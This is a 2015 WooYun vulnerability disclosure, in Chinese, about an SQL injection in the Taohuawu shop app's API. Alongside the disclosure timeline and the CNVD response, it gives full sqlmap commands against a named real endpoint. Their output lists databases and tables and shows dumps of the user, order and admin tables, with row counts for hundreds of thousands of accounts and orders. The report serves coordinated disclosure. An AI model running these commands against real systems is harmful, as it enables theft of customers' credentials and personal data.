当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118734

漏洞标题:桃花坞商城SQL注入漏洞(70万用户信息+30万订单信息+各种管理员信息)

相关厂商:桃花坞商城

漏洞作者: blackchef

提交时间:2015-06-09 16:00

修复时间:2015-07-27 13:48

公开时间:2015-07-27 13:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

成人电商啊,订单满天飞

详细说明:

APP客户端上的一个漏洞,话说哥们是搜Nice客户端,被推荐安装的这个APP,真心不是刚需安装啊。。。结果发现这个洞,解释多了都是泪啊,直接上poc
数据库

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" --dbs


[00:15:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:15:46] [INFO] fetching database names
[00:15:46] [INFO] the SQL query used returns 6 entries
[00:15:46] [INFO] resumed: information_schema
[00:15:46] [INFO] resumed: easy_taodata
[00:15:46] [INFO] resumed: jp_taodata
[00:15:46] [INFO] resumed: oto
[00:15:46] [INFO] resumed: taodata
[00:15:46] [INFO] resumed: zhidao_taohwu
available databases [6]:
[*] easy_taodata
[*] information_schema
[*] jp_taodata
[*] oto
[*] taodata
[*] zhidao_taohwu


200多张表

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata --tables


Database: taodata
[203 tables]
+------------------------------+
| ecs_category_2014-04-25      |
| ecs_goods_2014-04-25         |
| ecs_goods_gallery_2014-04-25 |
| app_activity_goods           |
| app_activity_time            |
| app_android_category         |
| app_article                  |
| app_article_category         |
| app_article_label            |
| app_article_reply            |
| app_bar                      |
| app_bar_at                   |
| app_bar_blackfans            |
| app_bar_category             |
| app_bar_checkin              |
| app_bar_collect              |
| app_bar_comment              |
| app_bar_comment20150107      |
| app_bar_fans                 |
| app_bar_img                  |
| app_bar_letter               |
| app_bar_points_log           |
| app_bar_power                |
| app_bar_praise               |
| app_channel                  |
| app_cpa_report               |
| app_field_category           |
| app_index_issue              |
| app_index_issue_category     |
| app_ios_category             |
| app_open_apply               |
| app_open_apply20140926       |
| app_recommend_download       |
| app_show_accuse              |
| app_show_collect             |
| app_show_comment             |
| app_show_field               |
| app_show_img                 |
| app_show_praise              |
| app_topic                    |
| app_user_idea                |
| aws_answer                   |
| aws_question                 |
| drp_goods_attr               |
| drp_goods_gallery            |
| ecs_account_log              |
| ecs_ad                       |
| ecs_ad_custom                |
| ecs_ad_keywords              |
| ecs_ad_keywords_click        |
| ecs_ad_position              |
| ecs_admin_action             |
| ecs_admin_log                |
| ecs_admin_message            |
| ecs_admin_user               |
| ecs_adsense                  |
| ecs_adv                      |
| ecs_adv_pic                  |
| ecs_affiliate_log            |
| ecs_agency                   |
| ecs_app_goods                |
| ecs_area_region              |
| ecs_article                  |
| ecs_article_attr             |
| ecs_article_cat              |
| ecs_attribute                |
| ecs_auction_log              |
| ecs_auto_manage              |
| ecs_back_goods               |
| ecs_back_order               |
| ecs_bonus_type               |
| ecs_booking_goods            |
| ecs_brand                    |
| ecs_card                     |
| ecs_cart                     |
| ecs_cat_filtrate_brand       |
| ecs_cat_filtrate_price       |
| ecs_cat_recommend            |
| ecs_category                 |
| ecs_collect_goods            |
| ecs_comment                  |
| ecs_comment_reply            |
| ecs_coupon                   |
| ecs_coupon_log               |
| ecs_crons                    |
| ecs_delivery_goods           |
| ecs_delivery_order           |
| ecs_email_list               |
| ecs_email_sendlist           |
| ecs_error_log                |
| ecs_exchange_goods           |
| ecs_express_log              |
| ecs_favourable_activity      |
| ecs_feedback                 |
| ecs_friend_link              |
| ecs_goods                    |
| ecs_goods_activity           |
| ecs_goods_adv_pic            |
| ecs_goods_article            |
| ecs_goods_attr               |
| ecs_goods_cat                |
| ecs_goods_copy               |
| ecs_goods_gallery            |
| ecs_goods_insale             |
| ecs_goods_ios                |
| ecs_goods_sales              |
| ecs_goods_stock              |
| ecs_goods_third              |
| ecs_goods_third_meal         |
| ecs_goods_type               |
| ecs_group_goods              |
| ecs_group_up                 |
| ecs_jiajiagou                |
| ecs_keywords                 |
| ecs_lasting_ticket           |
| ecs_link_goods               |
| ecs_mail_send_log            |
| ecs_mail_templates           |
| ecs_member_price             |
| ecs_message                  |
| ecs_mobile_adv_pic           |
| ecs_nav                      |
| ecs_new2_page_issue          |
| ecs_new_page_issue           |
| ecs_order_360info            |
| ecs_order_action             |
| ecs_order_goods              |
| ecs_order_info               |
| ecs_order_info20150104       |
| ecs_order_info_extend        |
| ecs_order_yhj                |
| ecs_orderlog                 |
| ecs_outbound_goods           |
| ecs_pack                     |
| ecs_package_goods            |
| ecs_page_issue               |
| ecs_pay_log                  |
| ecs_payment                  |
| ecs_plugins                  |
| ecs_postmoney_rule           |
| ecs_promotion_cfg            |
| ecs_qianggou                 |
| ecs_reg_extend_info          |
| ecs_reg_fields               |
| ecs_region                   |
| ecs_role                     |
| ecs_role_user                |
| ecs_searchengine             |
| ecs_sessions                 |
| ecs_sessions_data            |
| ecs_sex_test                 |
| ecs_sex_test_log             |
| ecs_shipping                 |
| ecs_shipping_area            |
| ecs_shop_config              |
| ecs_sms                      |
| ecs_snatch_log               |
| ecs_stats                    |
| ecs_storage_goods            |
| ecs_subscibe                 |
| ecs_suppliers                |
| ecs_tag                      |
| ecs_tag_cat                  |
| ecs_tag_cat_relation         |
| ecs_tag_relation             |
| ecs_taocan                   |
| ecs_template                 |
| ecs_topic                    |
| ecs_topic_issue              |
| ecs_user_account             |
| ecs_user_address             |
| ecs_user_bonus               |
| ecs_user_direct_price        |
| ecs_user_feed                |
| ecs_user_gift_coupon         |
| ecs_user_login_log           |
| ecs_user_rank                |
| ecs_users                    |
| ecs_virtual_card             |
| ecs_volume_price             |
| ecs_vote                     |
| ecs_vote_log                 |
| ecs_vote_option              |
| ecs_wap_category             |
| ecs_wholesale                |
| erp_action_log               |
| erp_admin                    |
| erp_permission               |
| erp_project                  |
| erp_purchase                 |
| erp_purchase_detail          |
| getbonus_log                 |
| ltb_session                  |
| stats_click                  |
| stats_goods                  |
| stats_order                  |
| stats_pv                     |
| stats_search_keys            |
| stats_user_order             |
| temp_Stat                    |
| temp_order                   |
| user_info                    |
| user_login_log               |
+------------------------------+


76万用户手机和密码等信息

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_users -C user_name,password,user_id --dump  --charset=UTF-8


[00:43:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:43:28] [INFO] fetching columns 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'
[00:43:28] [INFO] the SQL query used returns 3 entries
[00:43:28] [INFO] resumed: user_id
[00:43:28] [INFO] resumed: mediumint(8) unsigned
[00:43:28] [INFO] resumed: user_name
[00:43:28] [INFO] resumed: varchar(150)
[00:43:28] [INFO] resumed: password
[00:43:28] [INFO] resumed: varchar(32)
[00:43:28] [INFO] fetching entries of column(s) 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'
[00:43:28] [INFO] the SQL query used returns 764045 entries


38万订单数据

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_order_info --dump -C consignee,address,mobile,user_id --charset=UTF-8


[00:45:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:45:24] [INFO] fetching columns for table 'ecs_order_info' in database 'taodata'
[00:45:24] [INFO] the SQL query used returns 101 entries
[00:45:24] [INFO] fetching entries for table 'ecs_order_info' in database 'taodata'
[00:45:24] [INFO] the SQL query used returns 388531 entries


管理员数据

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_admin_user --dump --charset=UTF-8


[00:49:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:49:00] [INFO] fetching columns for table 'ecs_admin_user' in database 'taodata'
[00:49:00] [INFO] the SQL query used returns 14 entries
[00:49:00] [INFO] resumed: user_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: user_name
[00:49:00] [INFO] resumed: varchar(255)
[00:49:00] [INFO] resumed: email
[00:49:00] [INFO] resumed: varchar(255)
[00:49:00] [INFO] resumed: password
[00:49:00] [INFO] resumed: varchar(32)
[00:49:00] [INFO] resumed: add_time
[00:49:00] [INFO] resumed: int(11)
[00:49:00] [INFO] resumed: last_login
[00:49:00] [INFO] resumed: int(11)
[00:49:00] [INFO] resumed: last_ip
[00:49:00] [INFO] resumed: varchar(15)
[00:49:00] [INFO] resumed: action_list
[00:49:00] [INFO] resumed: text
[00:49:00] [INFO] resumed: nav_list
[00:49:00] [INFO] resumed: text
[00:49:00] [INFO] resumed: lang_type
[00:49:00] [INFO] resumed: varchar(50)
[00:49:00] [INFO] resumed: agency_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: suppliers_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: todolist
[00:49:00] [INFO] resumed: longtext
[00:49:00] [INFO] resumed: is_kf
[00:49:00] [INFO] resumed: tinyint(1)
[00:49:00] [INFO] fetching entries for table 'ecs_admin_user' in database 'taodata'
[00:49:00] [INFO] the SQL query used returns 15 entries

漏洞证明:

用户信息

taohuawuyonghu.png


订单信息

taohuawudingdan.png


管理员信息

taohuawuguanliyuan.png


修复方案:

看着改吧

版权声明:转载请注明来源 blackchef@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-06-12 13:47

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评论